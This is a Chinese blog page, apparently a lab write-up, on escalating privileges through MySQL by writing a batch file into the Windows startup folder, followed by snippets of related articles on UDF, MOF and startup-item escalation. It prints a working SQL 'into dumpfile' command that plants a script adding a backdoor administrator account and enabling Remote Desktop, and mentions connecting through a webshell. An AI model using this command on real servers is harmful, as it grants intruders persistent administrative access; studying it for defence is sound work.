Mysql数据库提权—开机启动项提权

最新推荐文章于 2024-05-29 14:48:53 发布
原创 最新推荐文章于 2024-05-29 14:48:53 发布 · 525 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

实验环境:windows2008、物理机

实验原理:利用Mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用

实验步骤:

一、利用中国菜刀连接win2008,并连接数据库

二、在数据库命令行写入命令:

select "net user cxr 123.com /add & net localgroup administrators cxr /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" " into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"

成功在开机启动目录写入以下文件,并开启远程连接端口,当被攻击者开机启动时,自动执行该文件中的命令 :

最低0.47元/天 解锁文章
Mysql之UDF
渗透之路,攻防之间皆学问
11-07 2万+
udf通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql限 —> 系统限。限制条件挺多,如下先获取mysql限(连接上了mysql数据库Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的限,即secure_file_priv的值为空。
数据库
weixin_71169068的博客
04-16 1176
利用此方法第一步先判断版本和安装路径:1.mysql5.1 则 导出dll文件到安装目录 /lib/plugin(这个目录默认是没有的,需要我们去创建)查看版本:mysql=>5.1跳转到安装目录发现lib目录下没有plugin,这里需要我们新建目录点击mysql,设置好路径,安装DLL执行命令,从而
内网渗透之——mysql数据库之——开机启动项
wsnbbz的博客
03-11 881
:只能在windows使用 原理 利用mysql,将后门写入开机启动项,因为是开机自启动,在写入之后,需要重启目标服务器才能生效(要求mysql限要很高,至少是管理员限甚至需要system限) 开机启动程序上传路径 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startu...
MySQL启动项
weixin_30293135的博客
03-24 124
关于MySQL启动项,听其名知其意。就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及命令! 这里有两种思路: 1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在...
Mysql 开机启动项
Fly_鹏程万里
06-07 650
原理 利用Mysql,将后门文件写入开机启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql限就很高,至少是管理员限,甚至是system),该实验只能在windows中使用。 方式 第一种:如果" C:\Documents and Settings\All Users\「开始」菜单\程序\启动 "目录存在可读写的限,那么我们可以直接将VBS脚本上传到该目录下! ...
Day4——学习之MySQL数据库启动项
0nc3的博客
12-17 289
0x00 原理 重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及命令。 0x01 利用条件 两种情况下均可用启动项 1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写 直接将 VBS 脚本上传到该目录下 2、以...
Linux安装Mysql数据库以及设置开机自启、卸载
10-11
本文将详细介绍一个完整的MySQL安装过程,包括如何设置数据库开机自启和卸载MySQL。以下是具体的步骤: 1. 首先,你需要将MySQL的安装包(如`mysql-8.0.29-el7-x86_64.tar.gz`)上传到 `/usr/local` 目录下。这可以...
升-MY&MS&ORA等SQL数据库
xhscxj的博客
03-02 1241
在利用系统溢出漏洞无果的情况下,可以采用数据库进行,但需要知道数据库的前条件: 服务器开启数据库服务及获取到最高限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库的可能 数据库应用升中的意义 WEB 或本地环境如何探针数据库应用 数据库限用户密码收集等方法 目前数据库对应的技术及方法等 流程:服务探针-信息收集-利用-获取限 一、UDF 知识点:(基于 MYSQL 调用命令执行函数) 读取网站数据库配置文件(了解其命名规则及查找技巧).
mysql启动项,mysql启动项写入 -电脑资料
weixin_31021619的博客
03-23 156
if (get_magic_quotes_gpc()){function stripslashes_deep($value){$value = is_array($value)?array_map('stripslashes_deep',$value):stripslashes($value);return $value;}$_POST = array_map('stripslashes_...
mysql--udf、mof、启动项
yang1234567898的博客
01-05 1312
1、udf 当获取到mysql的root限,需要进行升,可以尝试使用udf 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
mysql数据库程序 启动项_Day4——学习之MySQL数据库启动项
weixin_39801356的博客
01-19 150
0x00 原理重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及命令。0x01 利用条件两种情况下均可用启动项1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写直接将 VBS 脚本上传到该目录下2、以root账号...
启动项
yumengzth的博客
07-23 1941
0x00开机启动项 windows开机时候都会有一些开机启动的程序,那时候启动的程序限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到的目的。 0x01 关于自动化脚本 自动化脚本可以是bat文件,vbs文件等。 我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器限,查看服务器上系统盘的可读可写目录,若是启动目录 “...
mysql数据库
m0_63197559的博客
04-10 1620
MySQL数据库学习总结
mysql 一键安装 bat_MySql数据库Root用户
weixin_39852688的博客
11-21 223
(也可适用于WEBSHELL,此方法已被改进,不会弹黑CMD窗口.过段时间放出!)1、连接到mysql 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了mysql的的bin目录中   2、让我们来看看服务器中有些什么数据库mysql>show databases;mysql默认安装时会有mysql、test这两个数据库,如果你看到有其它...
数据库Mysql
白帽黑客鹏哥的博客
05-29 1989
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
后渗透—— 数据库开机启动项
爱国小白帽
03-12 902
开机启动项原理:利用mysql,将后门写入开机启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql限就很高,至少是管理员限甚至是system) 实验环境 Windows Server 2008 R2 x64 wamp MySQL-5.5.15-(64-bit).msi xampp-win32-5.6.28-1-VC11-installer 菜刀 s...
-MySQL数据库
acepanhuan的博客
02-28 2449
-MySQL数据库
升:Mysql 数据库 .(UDF || 启动项 || 反弹)
网络安全领域___专研者.
04-29 1754
升简称,由于操作系统都是多用户操作系统,用户之间都有限控制,比如通过 Web 漏洞拿到的是 Web 进程的限,往往 Web 服务都是以一个限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其升为管理甚至是 System 限。通常通过操作系统漏洞或操作系统的错误配置进行,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行
mysql数据库开机后自启动但服务无效,必须重启数据库才能正常使用,如何解决
最新发布
08-22
MySQL数据库在设置开机自启动后,若服务无效且必须重启后才能正常工作,通常与服务启动类型配置、系统资源限制、服务启动超时设置等因素有关。以下是一些关键的排查和解决方法: 确保MySQL服务的启动类型为“自动”。在Windows系统中,可以通过“服务”管理界面进行设置:找到“此电脑” → 右键选择“管理” → 进入“服务” → 找到MySQL服务 → 双击 → 将“启动类型”设置为“自动” → 点击“确定”保存更改[^3]。 在Linux系统中,可以通过`systemctl`命令来管理MySQL服务的开机自启动状态。使用以下命令设置MySQL服务开机自启动: ```bash systemctl enable mysqld.service ``` 同时,可以通过以下命令查看MySQL服务是否已设置为开机自启动: ```bash systemctl list-unit-files | grep mysqld.service ``` 若MySQL服务在开机时未能成功启动,可能是由于服务启动所需时间超过了系统默认的等待时间。在Windows系统中,服务管理器默认等待服务就绪的时间为30秒。如果MySQL服务需要更长时间来启动,可以通过修改注册表中的`ServicesPipeTimeout`值来延长等待时间。具体操作为:运行注册表编辑器 → 定位到`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control` → 新建一个DWORD(32位)值,命名为`ServicesPipeTimeout` → 修改其值为180000(180秒) → 确认更改并重启电脑[^4]。 此外,还需检查MySQL服务的日志文件,以确定是否有错误或警告信息,这些信息有助于进一步诊断问题。日志文件通常位于MySQL安装目录下的`data`文件夹中,或者可以在MySQL配置文件(如`my.cnf`或`my.ini`)中指定的日志路径找到。 对于Linux系统,可以使用以下命令查看MySQL服务的状态和日志信息: ```bash systemctl status mysqld.service journalctl -u mysqld.service ``` 最后,还需确保MySQL服务的依赖项已正确配置,并且在系统启动时能够按顺序启动。这可能涉及到其他服务(如网络服务)的启动顺序,确保MySQL服务在其依赖的服务之后启动。 通过以上方法,可以有效解决MySQL数据库开机自启动但服务无效的问题,高系统的稳定性和可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值